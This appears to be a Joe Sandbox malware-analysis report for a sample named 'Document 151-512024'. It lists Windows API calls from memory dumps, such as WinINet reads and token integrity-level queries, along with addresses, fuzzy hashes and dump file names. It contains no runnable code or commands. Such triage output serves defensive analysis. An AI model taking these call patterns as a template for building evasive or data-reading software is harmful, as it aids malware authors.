                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 18906cc37655792565ed15d364ebb2e4e723c862cdf4d56fc76c155577e5f34f
                                                                                                    • Instruction ID: 5c5926b23ed1b573f277528b3d6b528ba8e8de1f2d90aabd7450a8c639f59c2a
                                                                                                    • Opcode Fuzzy Hash: 18906cc37655792565ed15d364ebb2e4e723c862cdf4d56fc76c155577e5f34f
                                                                                                    • Instruction Fuzzy Hash: 3541D233A102049FCB24DFB8C881A5DB7F5EF89324F558568EA19EB351D631AD01CB90
                                                                                                    APIs
                                                                                                    • GetInputState.USER32 ref: 009B38CB
                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 009B3922
                                                                                                    • TranslateMessage.USER32(?), ref: 009B394B
                                                                                                    • DispatchMessageW.USER32(?), ref: 009B3955
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009B3966
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                    • String ID:
                                                                                                    • API String ID: 2256411358-0
                                                                                                    • Opcode ID: 54deffc1cbb9eeedc42c6613e9ce17c6aa8acde13aa78e5d3a34b78a7587eeed
                                                                                                    • Instruction ID: 74d0e7cb1e8f8158ec9aaf70c3ed579cb92bff0f71f0fa29613da632b648efc4
                                                                                                    • Opcode Fuzzy Hash: 54deffc1cbb9eeedc42c6613e9ce17c6aa8acde13aa78e5d3a34b78a7587eeed
                                                                                                    • Instruction Fuzzy Hash: 4A31E970508342EFEB35CB75DE48BF637ACAB05320F44C56DE562C60A0E7B4A685CB11
                                                                                                    APIs
                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 009BCF38
                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 009BCF6F
                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,009BC21E,00000000), ref: 009BCFB4
                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,009BC21E,00000000), ref: 009BCFC8
                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,009BC21E,00000000), ref: 009BCFF2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 3191363074-0
                                                                                                    • Opcode ID: 0c97eb2827845bd7190a870da7bdadc071356165583d7e21a9b392cd98d22ddb
                                                                                                    • Instruction ID: e5d8f5f2939de42e100e3c00a156604e2f756081c99d532148dac4a93195f51d
                                                                                                    • Opcode Fuzzy Hash: 0c97eb2827845bd7190a870da7bdadc071356165583d7e21a9b392cd98d22ddb
                                                                                                    • Instruction Fuzzy Hash: 5E315EB1604206EFDB20DFA5CA84ABBBBFDEB14361B10446EF516D2140DB30EE44DB60
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 009A1915
                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 009A19C1
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 009A19C9
                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 009A19DA
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 009A19E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3382505437-0
                                                                                                    • Opcode ID: 14e7cd8d128e85c792e690478fa4314a65e565bd48a1f4b38df309b5effebf49
                                                                                                    • Instruction ID: eea87c2b003c8bb9942cd18bebf96452a05b9474b5c98344d05389203a04c1c9
                                                                                                    • Opcode Fuzzy Hash: 14e7cd8d128e85c792e690478fa4314a65e565bd48a1f4b38df309b5effebf49
                                                                                                    • Instruction Fuzzy Hash: 1331C071A0421AEFCB00CFA8DD99ADF3BB9EB85315F104229F921AB2D1C7709944DB90
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 009D5745
                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 009D579D
                                                                                                    • _wcslen.LIBCMT ref: 009D57AF
                                                                                                    • _wcslen.LIBCMT ref: 009D57BA
                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 009D5816
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 763830540-0
                                                                                                    • Opcode ID: f519acd691b41457ca949c0f98f386a5b57e74f0710844dcfb2e11fef585f65f
                                                                                                    • Instruction ID: a07d185bbd82040062ab13b221c062e9ab18012adec74be63dafa17d1e758de8
                                                                                                    • Opcode Fuzzy Hash: f519acd691b41457ca949c0f98f386a5b57e74f0710844dcfb2e11fef585f65f
                                                                                                    • Instruction Fuzzy Hash: 2921A071944618EADB209FA5CC84AEEBBBCFF44760F10C617E929EB294D7708985CF50
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(00000000), ref: 009C0951
                                                                                                    • GetForegroundWindow.USER32 ref: 009C0968
                                                                                                    • GetDC.USER32(00000000), ref: 009C09A4
                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 009C09B0
                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 009C09E8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 4156661090-0
                                                                                                    • Opcode ID: a0aaac2870f0b5cee5ca42f5a917be6def79e7620c8deafd284b2add1a40e260
                                                                                                    • Instruction ID: c988b40fa346c57b487ea46c41a1ed6ef35b6dca8d4758973a475a28fa187f76
                                                                                                    • Opcode Fuzzy Hash: a0aaac2870f0b5cee5ca42f5a917be6def79e7620c8deafd284b2add1a40e260
                                                                                                    • Instruction Fuzzy Hash: F0215B75A04215AFD704EF65C988FAEBBE9EF88750F048469F84A97362CA30EC44DB50
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0097CDC6
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0097CDE9
                                                                                                      • Part of subcall function 00973820: RtlAllocateHeap.NTDLL(00000000,?,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6,?,00941129), ref: 00973852
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0097CE0F
                                                                                                    • _free.LIBCMT ref: 0097CE22
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0097CE31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: 1beae59ca33aa2aa67664c25573acdcfd6d22eeac2ea3fa420f4cdac6cccd973
                                                                                                    • Instruction ID: 14c3ba374c8ec36ca258377ce4f96490534e7bb55af0a10b5e508f8c9f081108
                                                                                                    • Opcode Fuzzy Hash: 1beae59ca33aa2aa67664c25573acdcfd6d22eeac2ea3fa420f4cdac6cccd973
                                                                                                    • Instruction Fuzzy Hash: CD0184F36066157F272116BA6C88D7BAA6DDFC6BA1315812EF909D7201EA618D0291B0
                                                                                                    APIs
                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00959693
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 009596A2
                                                                                                    • BeginPath.GDI32(?), ref: 009596B9
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 009596E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3225163088-0
                                                                                                    • Opcode ID: fc4604d0c9f75693a2ff75911fcc9cbba8af8c2d3fcf72a8f1da1a13d6c88296
                                                                                                    • Instruction ID: c2b50de561638af68ff8dadc2a19800c199d8ee1de71577e3fd30f12f853f5cd
                                                                                                    • Opcode Fuzzy Hash: fc4604d0c9f75693a2ff75911fcc9cbba8af8c2d3fcf72a8f1da1a13d6c88296
                                                                                                    • Instruction Fuzzy Hash: A5219270817306EFEF11DFA5EC197E97BA9BB40316F108216F960A61B0D374589ADF90
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2931989736-0
                                                                                                    • Opcode ID: 265039a73f733815e84dfe6925487f9f6b7d62018da8e4fe4997832a36fa77fa
                                                                                                    • Instruction ID: b66b3a0e27b55227879e4fdf0cdf05b1a65206482938423a5e6895c8c98ebd4d
                                                                                                    • Opcode Fuzzy Hash: 265039a73f733815e84dfe6925487f9f6b7d62018da8e4fe4997832a36fa77fa
                                                                                                    • Instruction Fuzzy Hash: B901DD61781A15FBD21855109D53FBB735C9FA23A8F068421FD1ABF741F764EE1082E0
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,0096F2DE,00973863,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6), ref: 00972DFD
                                                                                                    • _free.LIBCMT ref: 00972E32
                                                                                                    • _free.LIBCMT ref: 00972E59
                                                                                                    • SetLastError.KERNEL32(00000000,00941129), ref: 00972E66
                                                                                                    • SetLastError.KERNEL32(00000000,00941129), ref: 00972E6F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 40b1bd123befda532ed2145c107b6fa9861c2bec1870d7d0125154f13d5ccef8
                                                                                                    • Instruction ID: 69b33f08bd61e9b3b340abd0d901127fe6d31b1c9fcdd04fa786e8b80f5b2962
                                                                                                    • Opcode Fuzzy Hash: 40b1bd123befda532ed2145c107b6fa9861c2bec1870d7d0125154f13d5ccef8
                                                                                                    • Instruction Fuzzy Hash: 45012877265601B7C61367746C45E2B275DAFC53B1B25C539F82DA32D3EF748C825020
                                                                                                    APIs
                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?,?,009A035E), ref: 009A002B
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?), ref: 009A0046
                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?), ref: 009A0054
                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?), ref: 009A0064
                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0099FF41,80070057,?,?), ref: 009A0070
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3897988419-0
                                                                                                    • Opcode ID: c8a73f7df4471e164e081653fb6faf7fe24bbed1cf000101a96c25a707c29a55
                                                                                                    • Instruction ID: a0b603858df6d5ba424cf407e18d5f791b261d67c7049c70c965af286f6fa8a6
                                                                                                    • Opcode Fuzzy Hash: c8a73f7df4471e164e081653fb6faf7fe24bbed1cf000101a96c25a707c29a55
                                                                                                    • Instruction Fuzzy Hash: DF01DBB2615229BFDB104F68DC04FAA7BAEEB88392F104125F905D2210E770CD80EBA0
                                                                                                    APIs
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 009AE997
                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 009AE9A5
                                                                                                    • Sleep.KERNEL32(00000000), ref: 009AE9AD
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 009AE9B7
                                                                                                    • Sleep.KERNEL32 ref: 009AE9F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                    • String ID:
                                                                                                    • API String ID: 2833360925-0
                                                                                                    • Opcode ID: d7a322952dd66db8a72198541f874418b425586958d03d9458053a8e5af6a805
                                                                                                    • Instruction ID: 2426c5a419cdfa0904f475e96f5677d6283a0b44e72968f2d42ffdc9fff6620b
                                                                                                    • Opcode Fuzzy Hash: d7a322952dd66db8a72198541f874418b425586958d03d9458053a8e5af6a805
                                                                                                    • Instruction Fuzzy Hash: 4A016971C0AA2EDBCF00AFE5DC49AEEBB78FF4A300F000546E502B2240CB349590DBA1
                                                                                                    APIs
                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009A1114
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1120
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A112F
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009A0B9B,?,?,?), ref: 009A1136
                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009A114D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 842720411-0
                                                                                                    • Opcode ID: 39f1d2ec7086de31943d75c80c315caa0aa8ccc253646fdffb06c74d9b7692be
                                                                                                    • Instruction ID: 67924f2d1e21aeaa8f1697a65d616223892ea7f805fbf3e248e106c0dd3c0a76
                                                                                                    • Opcode Fuzzy Hash: 39f1d2ec7086de31943d75c80c315caa0aa8ccc253646fdffb06c74d9b7692be
                                                                                                    • Instruction Fuzzy Hash: 02016DB9145216BFDB114FA4DC49A6A3B6EEF86364B100415FA41C3350DB31DC40EA60
                                                                                                    APIs
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009A0FCA
                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009A0FD6
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009A0FE5
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009A0FEC
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009A1002
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 44706859-0
                                                                                                    • Opcode ID: 4e4fa639891ece8e3d8465f649afb00858cbbe15e8489438e1559b6e028d359b
                                                                                                    • Instruction ID: 22cbaca124a3155afce5df70361b788ed0a96dfc2006bd117b9da3271441fffd
                                                                                                    • Opcode Fuzzy Hash: 4e4fa639891ece8e3d8465f649afb00858cbbe15e8489438e1559b6e028d359b
                                                                                                    • Instruction Fuzzy Hash: 59F0C279185312EBDB210FA4DC4DF563B6DEF8A761F100415F905C72A0CA30DC80DA60
                                                                                                    APIs
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009A102A
                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009A1036
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009A1045
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009A104C
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009A1062
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 44706859-0
                                                                                                    • Opcode ID: 2aa91d647fdf54d78ea7431b32d5f0df424cae771e3186c398e0f57b9686be8e
                                                                                                    • Instruction ID: 3a98ff713fae01b7456452bee5b265cae368587ba4c6d6c9fd79cbf7d6445e7b
                                                                                                    • Opcode Fuzzy Hash: 2aa91d647fdf54d78ea7431b32d5f0df424cae771e3186c398e0f57b9686be8e
                                                                                                    • Instruction Fuzzy Hash: F5F06279195312EBDB215FA4EC49F563B6DEF8A761F110415F945C7290CA70D880DA60
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B0324
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B0331
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B033E
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B034B
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B0358
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,009B017D,?,009B32FC,?,00000001,00982592,?), ref: 009B0365
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
